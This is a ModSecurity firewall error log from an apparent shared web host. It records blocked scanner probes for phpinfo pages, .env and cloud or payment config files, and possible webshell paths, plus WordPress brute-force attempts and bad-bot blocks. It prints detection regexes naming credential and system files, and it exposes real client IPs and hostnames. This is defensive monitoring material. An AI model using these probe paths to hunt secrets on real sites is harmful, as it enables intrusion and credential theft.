[Tue May 26 13:17:08.393979 2026] [security2:error] [pid 501489:tid 501641] [client 4.204.220.190:9103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifeoye.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVP_GkFNZ9cRlz80IjLMwAAAJs"]
[Tue May 26 13:17:08.394086 2026] [security2:error] [pid 501489:tid 501641] [client 4.204.220.190:9103] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.lifeoye.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVP_GkFNZ9cRlz80IjLMwAAAJs"]
[Tue May 26 13:17:08.538994 2026] [security2:error] [pid 501489:tid 501674] [client 4.204.220.190:8779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifeoye.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVP_GkFNZ9cRlz80IjLNwAAALs"]
[Tue May 26 13:17:08.539114 2026] [security2:error] [pid 501489:tid 501674] [client 4.204.220.190:8779] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.lifeoye.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahVP_GkFNZ9cRlz80IjLNwAAALs"]
[Tue May 26 13:17:08.661301 2026] [security2:error] [pid 501489:tid 501721] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP_GkFNZ9cRlz80IjLKwAAAOo"]
[Tue May 26 13:17:10.673105 2026] [security2:error] [pid 501489:tid 501631] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVP_mkFNZ9cRlz80IjLYwAAAJE"]
[Tue May 26 13:17:11.148938 2026] [security2:error] [pid 501489:tid 501538] [remote 52.18.195.140:52424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVP_mkFNZ9cRlz80IjLegAAqzA"]
[Tue May 26 13:17:11.812763 2026] [security2:error] [pid 501489:tid 501652] [client 4.201.75.230:26381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/class-t.api.php"] [unique_id "ahVP_2kFNZ9cRlz80IjLjwAAAKU"]
[Tue May 26 13:17:12.399489 2026] [security2:error] [pid 501489:tid 501644] [client 185.191.171.14:36436] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVQAGkFNZ9cRlz80IjLnAAAAJ4"]
[Tue May 26 13:17:12.399597 2026] [security2:error] [pid 501489:tid 501644] [client 185.191.171.14:36436] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVQAGkFNZ9cRlz80IjLnAAAAJ4"]
[Tue May 26 13:17:13.206475 2026] [security2:error] [pid 501489:tid 501721] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQAGkFNZ9cRlz80IjLrAAAAOo"]
[Tue May 26 13:17:14.605839 2026] [security2:error] [pid 501489:tid 501647] [client 4.201.75.230:34703] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/sf.php"] [unique_id "ahVQAmkFNZ9cRlz80IjL_wAAAKA"]
[Tue May 26 13:17:14.692358 2026] [security2:error] [pid 501489:tid 501665] [client 4.201.75.230:5278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bigbootyhoez.com.md-74.webhostbox.net"] [uri "/cache.php"] [unique_id "ahVQAmkFNZ9cRlz80IjMBwAAALI"]
[Tue May 26 13:17:14.726181 2026] [security2:error] [pid 501489:tid 501578] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/.env.php"] [unique_id "ahVQAmkFNZ9cRlz80IjMCgAAqlg"]
[Tue May 26 13:17:16.073719 2026] [security2:error] [pid 501489:tid 501633] [client 79.117.246.51:53169] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.246.117.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "karuppuswamykovil.in"] [uri "/xmlrpc.php"] [unique_id "ahVQA2kFNZ9cRlz80IjMhQAAAJM"]
[Tue May 26 13:17:16.073991 2026] [security2:error] [pid 501489:tid 501633] [client 79.117.246.51:53169] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "karuppuswamykovil.in"] [uri "/xmlrpc.php"] [unique_id "ahVQA2kFNZ9cRlz80IjMhQAAAJM"]
[Tue May 26 13:17:16.096189 2026] [security2:error] [pid 501489:tid 501628] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQA2kFNZ9cRlz80IjMdgAAAI4"]
[Tue May 26 13:17:16.111941 2026] [security2:error] [pid 501489:tid 501576] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVQBGkFNZ9cRlz80IjMqwAA6FY"]
[Tue May 26 13:17:16.311521 2026] [security2:error] [pid 501489:tid 501563] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVQBGkFNZ9cRlz80IjMwgAAuUk"]
[Tue May 26 13:17:16.342801 2026] [security2:error] [pid 501489:tid 501583] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVQBGkFNZ9cRlz80IjMwwAApV0"]
[Tue May 26 13:17:16.736256 2026] [security2:error] [pid 501489:tid 501595] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/api/info.php"] [unique_id "ahVQBGkFNZ9cRlz80IjM4AAAzmk"]
[Tue May 26 13:17:16.803886 2026] [security2:error] [pid 501489:tid 501604] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/api/phpinfo.php"] [unique_id "ahVQBGkFNZ9cRlz80IjM6QAA_HI"]
[Tue May 26 13:17:17.223400 2026] [security2:error] [pid 501489:tid 501695] [client 4.201.75.230:34697] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/kbfr.php"] [unique_id "ahVQBWkFNZ9cRlz80IjNBgAAANA"]
[Tue May 26 13:17:18.438377 2026] [security2:error] [pid 501489:tid 501699] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQBWkFNZ9cRlz80IjNLwAAANQ"]
[Tue May 26 13:17:18.978074 2026] [security2:error] [pid 501489:tid 501495] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config.php"] [unique_id "ahVQBmkFNZ9cRlz80IjNtwAA8AU"]
[Tue May 26 13:17:19.113841 2026] [security2:error] [pid 501489:tid 501532] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/aws.php"] [unique_id "ahVQB2kFNZ9cRlz80IjNzAAAlio"]
[Tue May 26 13:17:19.137495 2026] [security2:error] [pid 501489:tid 501519] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/config.inc.php"] [unique_id "ahVQB2kFNZ9cRlz80IjNzgAAjB0"]
[Tue May 26 13:17:19.172633 2026] [security2:error] [pid 501489:tid 501549] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/config.php"] [unique_id "ahVQB2kFNZ9cRlz80IjN0wABAjs"]
[Tue May 26 13:17:19.264951 2026] [security2:error] [pid 501489:tid 501527] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/env.php"] [unique_id "ahVQB2kFNZ9cRlz80IjN2gAAqiU"]
[Tue May 26 13:17:19.288826 2026] [security2:error] [pid 501489:tid 501523] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/module.config.php"] [unique_id "ahVQB2kFNZ9cRlz80IjN3gAA7yE"]
[Tue May 26 13:17:19.292124 2026] [security2:error] [pid 501489:tid 501534] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/nexmo.php"] [unique_id "ahVQB2kFNZ9cRlz80IjN3wAAkyw"]
[Tue May 26 13:17:19.356388 2026] [security2:error] [pid 501489:tid 501713] [client 104.23.221.48:12796] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "lagoslawntennisclub1895.com"] [uri "/wp-admin/install.php"] [unique_id "ahVQB2kFNZ9cRlz80IjN1AAAAOI"]
[Tue May 26 13:17:19.405938 2026] [security2:error] [pid 501489:tid 501625] [client 114.119.149.78:28603] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "162.222.227.191"] [uri "/robots.txt"] [unique_id "ahVQB2kFNZ9cRlz80IjN6wAAAIs"]
[Tue May 26 13:17:19.419704 2026] [security2:error] [pid 501489:tid 501543] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/config/stripe.php"] [unique_id "ahVQB2kFNZ9cRlz80IjN7gAAjjU"]
[Tue May 26 13:17:20.157404 2026] [security2:error] [pid 501489:tid 501671] [client 98.226.175.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQB2kFNZ9cRlz80IjOFgAAALg"]
[Tue May 26 13:17:20.325878 2026] [security2:error] [pid 501489:tid 501502] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/info.php"] [unique_id "ahVQCGkFNZ9cRlz80IjOXgAA-gw"]
[Tue May 26 13:17:20.334431 2026] [security2:error] [pid 501489:tid 501505] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/infophp.php"] [unique_id "ahVQCGkFNZ9cRlz80IjOXwAAtQ8"]
[Tue May 26 13:17:20.346484 2026] [security2:error] [pid 501489:tid 501506] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/infos.php"] [unique_id "ahVQCGkFNZ9cRlz80IjOYQAAkBA"]
[Tue May 26 13:17:20.395098 2026] [security2:error] [pid 501489:tid 501648] [client 4.201.75.230:26377] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahVQCGkFNZ9cRlz80IjOZgAAAKE"]
[Tue May 26 13:17:20.821531 2026] [security2:error] [pid 501489:tid 501534] [remote 123.30.233.13:40828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVQCGkFNZ9cRlz80IjOgQAApSw"]
[Tue May 26 13:17:20.933674 2026] [security2:error] [pid 501489:tid 501679] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQCGkFNZ9cRlz80IjOcwAAAMA"]
[Tue May 26 13:17:21.217953 2026] [security2:error] [pid 501489:tid 501568] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/php-info.php"] [unique_id "ahVQCWkFNZ9cRlz80IjOqAAAx04"]
[Tue May 26 13:17:21.218518 2026] [security2:error] [pid 501489:tid 501576] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/php.php"] [unique_id "ahVQCWkFNZ9cRlz80IjOqgAA5FY"]
[Tue May 26 13:17:21.219725 2026] [security2:error] [pid 501489:tid 501561] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/php_info.php"] [unique_id "ahVQCWkFNZ9cRlz80IjOqwAA-kc"]
[Tue May 26 13:17:21.249657 2026] [security2:error] [pid 501489:tid 501567] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/phpinfo.php"] [unique_id "ahVQCWkFNZ9cRlz80IjOrwAAmU0"]
[Tue May 26 13:17:21.392702 2026] [security2:error] [pid 501489:tid 501564] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/public/phpinfo.php"] [unique_id "ahVQCWkFNZ9cRlz80IjOwAAAkUo"]
[Tue May 26 13:17:21.602989 2026] [security2:error] [pid 501489:tid 501651] [client 115.112.149.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVQCWkFNZ9cRlz80IjOwQAApEs"]
[Tue May 26 13:17:22.581133 2026] [security2:error] [pid 501489:tid 501665] [client 149.56.160.239:42147] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.thriveswift.com"] [uri "/index.php"] [unique_id "ahVQCmkFNZ9cRlz80IjPKgAAALI"]
[Tue May 26 13:17:22.998256 2026] [security2:error] [pid 501489:tid 501696] [client 4.201.75.230:6021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bigbootyhoez.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVQCmkFNZ9cRlz80IjPXAAAANE"]
[Tue May 26 13:17:23.074241 2026] [security2:error] [pid 501489:tid 501564] [remote 195.178.110.199:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.ndequipments.com"] [uri "/test.php"] [unique_id "ahVQC2kFNZ9cRlz80IjPZwAA-0o"]
[Tue May 26 13:17:23.079658 2026] [security2:error] [pid 501489:tid 501692] [client 4.201.75.230:26371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/defaults.php"] [unique_id "ahVQC2kFNZ9cRlz80IjPaAAAAM0"]
[Tue May 26 13:17:23.272794 2026] [security2:error] [pid 501489:tid 501575] [remote 167.172.25.98:33178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVQC2kFNZ9cRlz80IjPagAAiFU"]
[Tue May 26 13:17:23.495010 2026] [security2:error] [pid 501489:tid 501697] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQC2kFNZ9cRlz80IjPZAAAANI"]
[Tue May 26 13:17:23.593409 2026] [security2:error] [pid 501489:tid 501604] [remote 13.203.52.35:60338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.52.203.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVQC2kFNZ9cRlz80IjPkAAAtnI"]
[Tue May 26 13:17:23.923944 2026] [security2:error] [pid 501489:tid 501692] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahVQC2kFNZ9cRlz80IjPtwAAAM0"]
[Tue May 26 13:17:24.038760 2026] [security2:error] [pid 501489:tid 501724] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/backend/.env"] [unique_id "ahVQDGkFNZ9cRlz80IjPwAAAAOw"]
[Tue May 26 13:17:24.076318 2026] [security2:error] [pid 501489:tid 501673] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/*update.cgi*"] [unique_id "ahVQDGkFNZ9cRlz80IjPxwAAALo"]
